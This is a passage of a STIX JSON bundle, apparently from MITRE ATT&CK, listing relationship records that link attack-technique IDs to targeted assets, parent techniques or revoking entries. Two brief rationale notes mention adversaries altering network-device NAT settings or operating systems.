"attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4b036ee-be86-48cb-9f01-ab8f78e5bb37", "created": "2023-09-28T20:15:05.405Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:15:05.405Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4dd7251-ed87-4629-86b5-090e52a82df2", "created": "2024-04-09T21:00:32.387Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T21:00:32.387Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c535d995-bafd-47a3-9417-26e2e1080eb7", "created": "2020-01-24T15:51:52.478Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c53e4807-05e4-46d2-9cb9-fd6301ac3738", "created": "2020-02-11T18:42:35.660Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c54ccdc7-ed15-45c7-bfc9-f6e6e2b0d7f3", "created": "2020-01-30T16:36:51.584Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5589abe-78a2-4d41-8926-33aa3fc3337b", "created": "2020-03-13T20:10:00.218Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c58563a8-d757-4476-8ae2-beb2acce38b3", "created": "2023-10-02T20:20:55.473Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:20:55.473Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c596f45a-ad65-4673-b316-05378175f35e", "created": "2024-04-09T20:54:19.196Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:54:19.196Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5a69738-3e80-421d-aba2-bdab8a4029fd", "created": "2023-09-29T18:43:49.839Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:43:49.839Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c640c6d3-e2b6-4546-80e5-7bcfae79f078", "created": "2024-05-22T17:19:22.624Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:18:02.068Z", "description": "Asset Mapping Rationale: Adversaries may bridge network boundaries by modifying a network device\u2019s Network Address Translation (NAT) configuration. Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks.", "relationship_type": "targets", "source_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c65e39eb-f6d1-4e3a-9070-b2fa7ea35b36", "created": "2023-09-28T21:27:50.246Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:27:50.246Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c6a05c20-02d4-42ce-ad5c-280c604e13d8", "created": "2023-09-29T17:59:11.267Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:59:11.267Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c6a3ab9f-8136-4965-a765-261d95b433e6", "created": "2023-03-14T14:38:03.823Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-03-14T14:38:03.823Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7ab9f46-f60e-4156-b56f-415e39bc7dd9", "created": "2020-03-02T19:24:01.041Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8019115-38f0-4949-b7c6-331898b2cc83", "created": "2020-02-21T20:35:49.249Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044", "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8222300-6c5e-42d6-ae67-3595407b89fd", "created": "2024-04-09T20:54:39.801Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:54:39.801Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c848d2d3-ded6-45a0-b942-3763bbd10d5c", "created": "2020-02-26T17:46:13.236Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8e5d0e1-9d60-4f10-984e-735f6d7ce91f", "created": "2020-01-17T19:13:50.516Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c9005a9a-c6c5-4044-82d7-f108b2e72f93", "created": "2020-02-12T14:09:53.660Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "target_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c93632b4-0a7a-4492-a0e2-d57cffe7ff64", "created": "2020-07-07T16:44:26.688Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2020-10-27T14:49:39.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": true, "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c93ca587-24fe-44d0-951e-30d82b9e6198", "created": "2020-02-18T18:03:37.714Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c95850f4-4616-435c-b237-f1985833d40e", "created": "2023-09-29T16:29:39.918Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:29:39.918Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c973e69a-f07c-470b-a04a-82cd91216c26", "created": "2022-01-13T20:02:28.626Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c9a1bcec-9a4d-4693-accb-5a6f67b857f6", "created": "2020-02-12T18:55:24.841Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c9fb4adb-8064-426a-838d-c93674fb380b", "created": "2023-09-29T18:44:38.035Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:44:38.035Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca13a117-aae0-4802-878b-c09f4a04dd31", "created": "2023-09-28T20:06:50.018Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:06:50.018Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca225ea0-e813-4205-98db-707b474ae24f", "created": "2024-04-09T20:49:44.575Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:49:44.575Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca38e574-09b1-4fc3-beb1-2af04189c05d", "created": "2020-10-02T14:56:25.034Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cae74287-23c7-4e53-aea6-9058bdc77337", "created": "2024-05-22T17:17:39.235Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:18:45.124Z", "description": "Asset Mapping Rationale: Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.", "relationship_type": "targets", "source_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb197e40-0c4d-403f-b385-8ca378461de9", "created": "2024-03-28T15:36:34.861Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-28T15:36:34.861Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb273dc3-b4cf-4f74-9bf7-c9f5c0afcde2", "created": "2020-01-24T13:51:48.205Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae", "target_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb3b9d54-ba89-4af4-8724-3ffde36d101c", "created": "2020-03-13T20:15:32.053Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb4015bf-e7a4-4b26-8816-1f7a996adf4f", "created": "2020-03-20T15:22:53.973Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", "target_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb47a3bb-daec-4aa1-9a92-af2a61bb65cd", "created": "2023-09-28T21:14:29.099Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:14:29.099Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cbc65a60-3b40-4ecf-a10d-8ef1be72568d", "created": "2024-04-09T20:54:26.301Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:54:26.301Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cbee31a0-716c-4b10-83f0-aa889bfb4749", "created": "2023-10-20T17:05:25.595Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-20T17:05:25.595Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cc1f7b0c-a443-46ee-b9d6-b7ecb9ead9fa", "created": "2023-06-02T15:27:58.785Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-06-02T15:27:58.785Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cc5c77ce-c5a3-4791-b80e-09d35282443a", "created": "2023-09-29T16:30:08.166Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:30:08.166Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, 